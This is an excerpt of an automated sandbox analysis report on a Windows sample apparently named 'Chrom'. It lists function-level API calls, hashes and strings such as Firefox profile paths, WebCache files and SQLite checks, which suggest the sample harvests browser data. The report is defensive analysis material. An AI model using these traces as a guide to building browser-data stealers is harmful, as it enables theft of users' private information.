                                                                                                                                                        • Instruction Fuzzy Hash: BF4134B294121CAADB20EB56DC81FCF777CAF85314F1144ABB508F2142E6795B84CF6A
                                                                                                                                                        Function 004167D1 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004167FF
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416810
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416821
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416832
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416843
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416854
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416865
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2941347001-0
                                                                                                                                                        • Opcode ID: 6c7181999001807cf19655f7a5c886da2927c02d6c206d7826a88d8cf07677d3
                                                                                                                                                        • Instruction ID: 405c2e4babdb8952247d8a080dcda94cd63fb6e5d2decb1bec32cb30ddcbd491
                                                                                                                                                        • Opcode Fuzzy Hash: 6c7181999001807cf19655f7a5c886da2927c02d6c206d7826a88d8cf07677d3
                                                                                                                                                        • Instruction Fuzzy Hash: 911124B0504744AEF6207F72DD0BE277AA5EF41B14F11483EF0965A8E1DB7AA8608F24
                                                                                                                                                        Function 0041A2D6 Relevance: 9.1, APIs: 6, Instructions: 140fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNELBASE(?,-7FBE6346,00000003,00000000,?,?,00000000), ref: 0041A3AE
                                                                                                                                                        • CreateFileA.KERNEL32(?,-7FBE6346,00000003,00000000,00419C3A,00419C3A,00000000), ref: 0041A3C6
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A3D5
                                                                                                                                                        • free.MSVCRT ref: 0041A3E2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile$ErrorLastfree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 77810686-0
                                                                                                                                                        • Opcode ID: 3837423018413e79f1a8055628a625645689c72852c8b795b1528378839c1df6
                                                                                                                                                        • Instruction ID: c70e6a76c9c0c16949b2d84360e4fde80b94c386b4f0d6e6335da104fa2cc62f
                                                                                                                                                        • Opcode Fuzzy Hash: 3837423018413e79f1a8055628a625645689c72852c8b795b1528378839c1df6
                                                                                                                                                        • Instruction Fuzzy Hash: DE4135B15093059FE720DF25DC4178BBBE4EF84324F14892EF8A482291D378D9A88B97
                                                                                                                                                        Function 00412F8E Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00412FAA
                                                                                                                                                        • memset.MSVCRT ref: 00412FBF
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                          • Part of subcall function 00409CD8: wcslen.MSVCRT ref: 00409CD9
                                                                                                                                                          • Part of subcall function 00409CD8: wcscat.MSVCRT ref: 00409CF1
                                                                                                                                                        • wcscat.MSVCRT ref: 00412FE8
                                                                                                                                                          • Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
                                                                                                                                                          • Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
                                                                                                                                                          • Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62
                                                                                                                                                        • wcscat.MSVCRT ref: 00413011
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                        • API String ID: 1534475566-1174173950
                                                                                                                                                        • Opcode ID: ba6c0ebe88ac952b5c194dcd9fe97a1dc60b886a3a66e04ae42cc6cfcfc4ce36
                                                                                                                                                        • Instruction ID: 422148556ace2f77c93d77bf435b4c82adbc6076694dfca18b1a60226733ba9e
                                                                                                                                                        • Opcode Fuzzy Hash: ba6c0ebe88ac952b5c194dcd9fe97a1dc60b886a3a66e04ae42cc6cfcfc4ce36
                                                                                                                                                        • Instruction Fuzzy Hash: 0801C2B2A4132C65DB207B228C86ECB732C9F45758F0144BBB504E7143D9788DC88AA9
                                                                                                                                                        Function 00403C78 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00408D81: free.MSVCRT ref: 00408D88
                                                                                                                                                          • Part of subcall function 00413F68: memset.MSVCRT ref: 00413FEF
                                                                                                                                                          • Part of subcall function 00413F68: wcsrchr.MSVCRT ref: 00414007
                                                                                                                                                        • memset.MSVCRT ref: 00403D7B
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,00001E38), ref: 00403D94
                                                                                                                                                        • wcscmp.MSVCRT ref: 00403DC0
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00403DFD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2758756878-3916222277
                                                                                                                                                        • Opcode ID: 86d052ae708fb1be17ff2d385b546714b6cc9c000aacad6c9d693117b8ff7004
                                                                                                                                                        • Instruction ID: 3324fc85694a20c99f30ee3fab2bb6b3f261583d23399c464f958340e94e5838
                                                                                                                                                        • Opcode Fuzzy Hash: 86d052ae708fb1be17ff2d385b546714b6cc9c000aacad6c9d693117b8ff7004
                                                                                                                                                        • Instruction Fuzzy Hash: 6D415C716083858ED730DF25C845A8FB7E8EFC6314F504D2FE48893681DB7899498B57
                                                                                                                                                        Function 00416B94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416AE7: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00416B0A
                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                        • memset.MSVCRT ref: 00416BED
                                                                                                                                                        • RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
                                                                                                                                                        • wcscpy.MSVCRT ref: 00416C62
                                                                                                                                                          • Part of subcall function 0040A2A9: GetVersionExW.KERNEL32(0045E340,0000001A,00416BB5,?,00000000), ref: 0040A2C3
                                                                                                                                                        Strings
                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00416C08, 00416C18
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                        • API String ID: 71295984-2036018995
                                                                                                                                                        • Opcode ID: 8c20b169bd282f672307cfd0e33e5ead9d42bdd278c07b69ec96e2cf80f58d4a
                                                                                                                                                        • Instruction ID: cef4cdc2aa1c6a3535febfa580eefb1bb336ec347ee4d762a3996ce24f9a1629
                                                                                                                                                        • Opcode Fuzzy Hash: 8c20b169bd282f672307cfd0e33e5ead9d42bdd278c07b69ec96e2cf80f58d4a
                                                                                                                                                        • Instruction Fuzzy Hash: 16110B31901224AADB24B35D9C4D9EF736CDB01308F6204ABE805A2152E628EEC586DE
                                                                                                                                                        Function 00416312 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • wcschr.MSVCRT ref: 0041632C
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00416351
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,004552B8), ref: 0041636F
                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,004136D7,?,00000000,004552B8), ref: 00416387
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                        • String ID: "%s"
                                                                                                                                                        • API String ID: 1343145685-3297466227
                                                                                                                                                        • Opcode ID: 3aaa40ebdc19578b97ff3075b960e6db10c6f9077613310ec93345511b7ae3b9
                                                                                                                                                        • Instruction ID: 6e1343c4dc7dbf7023b058b03300c33d8cf364170467c751c5f20a7e8d9ce334
                                                                                                                                                        • Opcode Fuzzy Hash: 3aaa40ebdc19578b97ff3075b960e6db10c6f9077613310ec93345511b7ae3b9
                                                                                                                                                        • Instruction Fuzzy Hash: 3A018B3240421EBBEF219F40DC05FEA3B6AFF05304F048065BD24901A1D33AC565DB99
                                                                                                                                                        Function 004156F1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,004158EF,?,?,?,00000000,?,00000000,?), ref: 00415702
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041571C
                                                                                                                                                        • GetProcessTimes.KERNELBASE(00000000,?,00000000,?,?,?,004158EF,?,?,?,00000000,?,00000000,?), ref: 0041573F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                        • API String ID: 1714573020-3385500049
                                                                                                                                                        • Opcode ID: cc6b767486beea88798ecaabffb4101cb485a2642c9037223f23588e5dcb7f65
                                                                                                                                                        • Instruction ID: a8c3bf7ddc1ca0b25540cafbdac30c397c85bf92067745488bba3609cc165c05
                                                                                                                                                        • Opcode Fuzzy Hash: cc6b767486beea88798ecaabffb4101cb485a2642c9037223f23588e5dcb7f65
                                                                                                                                                        • Instruction Fuzzy Hash: 4DF01C75140708EFDB019FA4FD06BA63BA4EB48342F044075B91CD2562D776C9A8DF5A
                                                                                                                                                        Function 00445E0F Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 219COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(00000048,00452BA0,0000002C,000003FF,?,?,00000000,?,00401230), ref: 00445EC0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID: BINARY$NOCASE$RTRIM$no such vfs: %s
                                                                                                                                                        • API String ID: 3510742995-3177411277
                                                                                                                                                        • Opcode ID: 1165683c971d253af972ad931778c34b410deae4bfcb81e51aa8cc138b68385f
                                                                                                                                                        • Instruction ID: 74b0bd9825c19e6685264d1484a235018c45777622f8ba0ce628bc876c866ef4
                                                                                                                                                        • Opcode Fuzzy Hash: 1165683c971d253af972ad931778c34b410deae4bfcb81e51aa8cc138b68385f
                                                                                                                                                        • Instruction Fuzzy Hash: 03710A71604701BFE710AF16CCC1EA6B7A8BB05318F15452FF41897383DB79E8958BAA
                                                                                                                                                        Function 00409A0C Relevance: 7.7, APIs: 6, Instructions: 191COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00409A2F
                                                                                                                                                          • Part of subcall function 0040ACA5: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040121D,?,?,?,?,?,?,?), ref: 0040ACBE
                                                                                                                                                          • Part of subcall function 00404F45: memset.MSVCRT ref: 00404F65
                                                                                                                                                        • memset.MSVCRT ref: 00409A82
                                                                                                                                                        • memset.MSVCRT ref: 00409A9A
                                                                                                                                                        • memset.MSVCRT ref: 00409AB2
                                                                                                                                                        • memset.MSVCRT ref: 00409ACA
                                                                                                                                                        • memset.MSVCRT ref: 00409AE2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2911713577-0
                                                                                                                                                        • Opcode ID: b2a1f19d586bb9d584c5167c27d38584a59658dc22e7c63e49521902dc34c3a0
                                                                                                                                                        • Instruction ID: 17c299170da2f5c18cd71e263501a174130e3f539370559341ef3f42c2fa300c
                                                                                                                                                        • Opcode Fuzzy Hash: b2a1f19d586bb9d584c5167c27d38584a59658dc22e7c63e49521902dc34c3a0
                                                                                                                                                        • Instruction Fuzzy Hash: 725189B290121CBEEB50FB51DC42EDF776CEF04314F0100BAB908B6182EA759F949BA5
                                                                                                                                                        Function 004210FD Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcmp.MSVCRT(?,?,00000004,00000007,?), ref: 0042115A
                                                                                                                                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,00000007,?), ref: 00421185
                                                                                                                                                        • memcmp.MSVCRT(?,@ ,00000003,?,00000007,?), ref: 004211F1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcmp
                                                                                                                                                        • String ID: @ $SQLite format 3
                                                                                                                                                        • API String ID: 1475443563-3708268960
                                                                                                                                                        • Opcode ID: 637f62bee6550b69d90550379ef7f2363dd965a9b2d4ce58cbe17c4226d1441a
                                                                                                                                                        • Instruction ID: 8a8e30af19285e6602da34aa628d26869ae88a683b6dca71fc9513d498463ada
                                                                                                                                                        • Opcode Fuzzy Hash: 637f62bee6550b69d90550379ef7f2363dd965a9b2d4ce58cbe17c4226d1441a
                                                                                                                                                        • Instruction Fuzzy Hash: A451F271A00225DBDB10DFA9D8817AAB7F4EF64314F55019BE804EB256D778EE01CBA8
                                                                                                                                                        Function 00410C23 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmpqsort
                                                                                                                                                        • String ID: /nosort$/sort
                                                                                                                                                        • API String ID: 1579243037-1578091866
                                                                                                                                                        • Opcode ID: c07a100eaa3c38faba3df5a66cb89ab60920950fe83399008d8303a833aca2b3
                                                                                                                                                        • Instruction ID: 144d33eed54290a6f9744a9a5dbcb7717411fe56fc34cf4e9986f4238599fcc7
                                                                                                                                                        • Opcode Fuzzy Hash: c07a100eaa3c38faba3df5a66cb89ab60920950fe83399008d8303a833aca2b3
                                                                                                                                                        • Instruction Fuzzy Hash: F221F8707006019FE318AB36C981E96B3A9FF95314B11026FE4259B291DBB5BCD18BDD
                                                                                                                                                        Function 0040C34B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040C36D
                                                                                                                                                        • memset.MSVCRT ref: 0040C387
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                        Strings
                                                                                                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040C3A5
                                                                                                                                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040C3CD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                        • API String ID: 2887208581-2114579845
                                                                                                                                                        • Opcode ID: 394c4c75fa7beffb2d5a2aa385abc5dc66d0e768d5be117711317e139cb40491
                                                                                                                                                        • Instruction ID: 3131e6838cf381c5c62b3ff9a3a8967ade7f88a79be8704d85ddc64b4c2fe5ff
